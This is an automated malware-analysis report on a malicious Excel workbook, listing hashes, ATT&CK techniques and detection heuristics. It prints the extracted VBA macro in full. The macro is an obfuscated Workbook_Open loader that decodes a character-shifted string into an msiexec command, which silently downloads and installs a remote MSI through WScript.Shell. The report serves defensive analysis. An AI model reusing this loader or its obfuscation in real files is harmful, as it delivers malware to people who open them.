Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 b58db52777b6fef0…

MALICIOUS

Office (OOXML)

Size: 14.1 KB
Created: 2020-05-18 23:05:55 UTC
Authoring application: Microsoft Excel 15.0300
First seen: 2020-09-07
MD5: d3ba5c2331e953d8184d30dfa4f3c493
SHA-1: c70ebd7e14b0ec8053564046045e68387e52a38a
SHA-256: b58db52777b6fef07e26aa8258b9b50d22bc594eece4793c85ae98501a8a5d74
Risk score: 228

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is an Office document containing a Workbook_Open macro that executes obfuscated VBA code. The code uses WScript.Shell and the Shell() function, indicating an attempt to run arbitrary commands. Together, these critical heuristics strongly suggest the document is designed to download and execute a secondary payload.

Heuristics (6)

  • VBA project inside OOXML (severity: medium, 5 related findings, rule: OOXML_VBA)
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage (severity: critical, rule: OLE_VBA_WSCRIPT)
    WScript.Shell usage
    Matched lines in script:
    Function YG_qY5_JLw_G9kcVH_acuBDMl7J_UTmH38hnLTjrj1BuOEhUaQo_yggVD(rdMifyOweG76NVBHquRf3D4JT5fAQhMSI_DByQoiydG49GGa3Q7_7A9njCNkTMg63oveQ9S As String)
    WdgVQ9pRDBG_WL7TVFe3c3GYbSfBKnnFieaFBvqTk7VtCgNN6XitqdPcVG38dmFZXAL2uzQjaJRfhXU5_PE = "WSCript.shell"
    OUK9hDazSDEOjK6E_Iw7vuja3M_PAuvKUFEvcEXcX8MvYFloC8Uvj28cu_ESTIxgP44b_Imp_TjwivBvlEMCa9lbHn_t_DHMIqfdLHi3UqANSI39sSsN6_EPRbRbH3prKUo2QhjbgSs_8WH9tAA = 0
  • Obfuscated auto-exec VBA loader (severity: critical, rule: OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched lines in script:
    Function YG_qY5_JLw_G9kcVH_acuBDMl7J_UTmH38hnLTjrj1BuOEhUaQo_yggVD(rdMifyOweG76NVBHquRf3D4JT5fAQhMSI_DByQoiydG49GGa3Q7_7A9njCNkTMg63oveQ9S As String)
    WdgVQ9pRDBG_WL7TVFe3c3GYbSfBKnnFieaFBvqTk7VtCgNN6XitqdPcVG38dmFZXAL2uzQjaJRfhXU5_PE = "WSCript.shell"
    OUK9hDazSDEOjK6E_Iw7vuja3M_PAuvKUFEvcEXcX8MvYFloC8Uvj28cu_ESTIxgP44b_Imp_TjwivBvlEMCa9lbHn_t_DHMIqfdLHi3UqANSI39sSsN6_EPRbRbH3prKUo2QhjbgSs_8WH9tAA = 0
  • CreateObject call (severity: high, rule: OLE_VBA_CREATEOBJ)
    CreateObject call
    Matched lines in script:
    OUK9hDazSDEOjK6E_Iw7vuja3M_PAuvKUFEvcEXcX8MvYFloC8Uvj28cu_ESTIxgP44b_Imp_TjwivBvlEMCa9lbHn_t_DHMIqfdLHi3UqANSI39sSsN6_EPRbRbH3prKUo2QhjbgSs_8WH9tAA = 0
    Set Nspv3nPDwlplHxAxA_LDY5_FFYDB5qrmiPO9nCDd6jgmOnQsWvhAvreRnhpdiMHG3BC2 = CreateObject(WdgVQ9pRDBG_WL7TVFe3c3GYbSfBKnnFieaFBvqTk7VtCgNN6XitqdPcVG38dmFZXAL2uzQjaJRfhXU5_PE)
    fDb_9y1J5N_BxHwJ_33_Q8fZxjCq2SVaKjrPG6kBJkT1gSlHyiEnmVuhhB5YuKRl1jzObgCwS1xqno2f84ySMtwxvHsEAJO9Rs_6bUrSfQ = Nspv3nPDwlplHxAxA_LDY5_FFYDB5qrmiPO9nCDd6jgmOnQsWvhAvreRnhpdiMHG3BC2.Run(rdMifyOweG76NVBHquRf3D4JT5fAQhMSI_DByQoiydG49GGa3Q7_7A9njCNkTMg63oveQ9S, OUK9hDazSDEOjK6E_Iw7vuja3M_PAuvKUFEvcEXcX8MvYFloC8Uvj28cu_ESTIxgP44b_Imp_TjwivBvlEMCa9lbHn_t_DHMIqfdLHi3UqANSI39sSsN6_EPRbRbH3prKUo2QhjbgSs_8WH9tAA)
  • VBA p-code auto-exec with execution tokens (severity: high, rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro (severity: low, rule: OLE_VBA_WBOPEN)
    Workbook_Open macro
    Matched lines in script:
    Attribute VB_Customizable = True
    Private Sub workbook_open()
    ylouQK_W1_XI_S7vl2QT8n.nXiuHO6os6Kxqabh__zEV

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Artifact 1
Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 3291 bytes
SHA-256: 2325252393fdfb8c9c6c1492f340fcdb76d338e43910fd1c88d99e0162d06d37

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
ylouQK_W1_XI_S7vl2QT8n.nXiuHO6os6Kxqabh__zEV

End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ylouQK_W1_XI_S7vl2QT8n"
Function YG_qY5_JLw_G9kcVH_acuBDMl7J_UTmH38hnLTjrj1BuOEhUaQo_yggVD(rdMifyOweG76NVBHquRf3D4JT5fAQhMSI_DByQoiydG49GGa3Q7_7A9njCNkTMg63oveQ9S As String)
WdgVQ9pRDBG_WL7TVFe3c3GYbSfBKnnFieaFBvqTk7VtCgNN6XitqdPcVG38dmFZXAL2uzQjaJRfhXU5_PE = "WSCript.shell"
OUK9hDazSDEOjK6E_Iw7vuja3M_PAuvKUFEvcEXcX8MvYFloC8Uvj28cu_ESTIxgP44b_Imp_TjwivBvlEMCa9lbHn_t_DHMIqfdLHi3UqANSI39sSsN6_EPRbRbH3prKUo2QhjbgSs_8WH9tAA = 0
Set Nspv3nPDwlplHxAxA_LDY5_FFYDB5qrmiPO9nCDd6jgmOnQsWvhAvreRnhpdiMHG3BC2 = CreateObject(WdgVQ9pRDBG_WL7TVFe3c3GYbSfBKnnFieaFBvqTk7VtCgNN6XitqdPcVG38dmFZXAL2uzQjaJRfhXU5_PE)
fDb_9y1J5N_BxHwJ_33_Q8fZxjCq2SVaKjrPG6kBJkT1gSlHyiEnmVuhhB5YuKRl1jzObgCwS1xqno2f84ySMtwxvHsEAJO9Rs_6bUrSfQ = Nspv3nPDwlplHxAxA_LDY5_FFYDB5qrmiPO9nCDd6jgmOnQsWvhAvreRnhpdiMHG3BC2.Run(rdMifyOweG76NVBHquRf3D4JT5fAQhMSI_DByQoiydG49GGa3Q7_7A9njCNkTMg63oveQ9S, OUK9hDazSDEOjK6E_Iw7vuja3M_PAuvKUFEvcEXcX8MvYFloC8Uvj28cu_ESTIxgP44b_Imp_TjwivBvlEMCa9lbHn_t_DHMIqfdLHi3UqANSI39sSsN6_EPRbRbH3prKUo2QhjbgSs_8WH9tAA)
End Function
Sub nXiuHO6os6Kxqabh__zEV()

vV_AcneGNt_oxAWM2LvlCCv__ = m_n1(69) & m_n1(79) & m_n1(102) & m_n1(34) & m_n1(49) & m_n1(69) & m_n1(34) & m_n1(111) & m_n1(117) & m_n1(96) & m_n1(107) & m_n1(71) & m_n1(96) & m_n1(122) & m_n1(96) & m_n1(103) & m_n1(101)
vV_AcneGNt_oxAWM2LvlCCv__ = vV_AcneGNt_oxAWM2LvlCCv__ & m_n1(34) & m_n1(49) & m_n1(107) & m_n1(34) & m_n1(106) & m_n1(118) & m_n1(118) & m_n1(114) & m_n1(60) & m_n1(49) & m_n1(49) & m_n1(105) & m_n1(113) & m_n1(118) & m_n1(119) & m_n1(116) & m_n1(107) & m_n1(124) & m_n1(111) & m_n1(48) & m_n1(101) & m_n1(113) & m_n1(111) & m_n1(49) & m_n1(121) & m_n1(114) & m_n1(47) & m_n1(101) & m_n1(113) & m_n1(112) & m_n1(118) & m_n1(103) & m_n1(112) & m_n1(118) & m_n1(49) & _
 m_n1(118) & m_n1(106) & m_n1(103) & m_n1(111) & m_n1(103) & m_n1(117) & m_n1(49) & m_n1(100) & m_n1(119) & m_n1(117) & m_n1(107) & m_n1(104) & m_n1(123) & m_n1(49) & m_n1(118) & m_n1(103) & m_n1(111) & m_n1(114) & m_n1(49) & m_n1(56) & m_n1(50) & m_n1(52) & m_n1(51) & m_n1(57) & m_n1(57) & m_n1(53) & m_n1(48) & m_n1(111) & m_n1(117) & m_n1(107) & m_n1(34) & m_n1(49) & m_n1(115) & m_n1(112) & _
 m_n1(34)
On Error Resume Next
v_4ZDM7_32sy8y5UATUbEE9QfJ_47u82MfSUdlGpx_WqsTTpmCSl_x_qEm42cBvF4xmbfj1ZKpn_tRiJz_R3cVGXfmOzqNLuROu3r2HBK2YDJ_7vCtBW = vV_AcneGNt_oxAWM2LvlCCv__
YG_qY5_JLw_G9kcVH_acuBDMl7J_UTmH38hnLTjrj1BuOEhUaQo_yggVD (v_4ZDM7_32sy8y5UATUbEE9QfJ_47u82MfSUdlGpx_WqsTTpmCSl_x_qEm42cBvF4xmbfj1ZKpn_tRiJz_R3cVGXfmOzqNLuROu3r2HBK2YDJ_7vCtBW)
End Sub
Function m_n1(nm As Integer)
m_n1 = Chr(nm - 2)
End Function

Artifact 2
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: xl/vbaProject.bin
Size: 17920 bytes
SHA-256: 7c78e1d0f5a2047d62ec982bdc40f5a559fbc6c5f71907b47237f9ca8d661775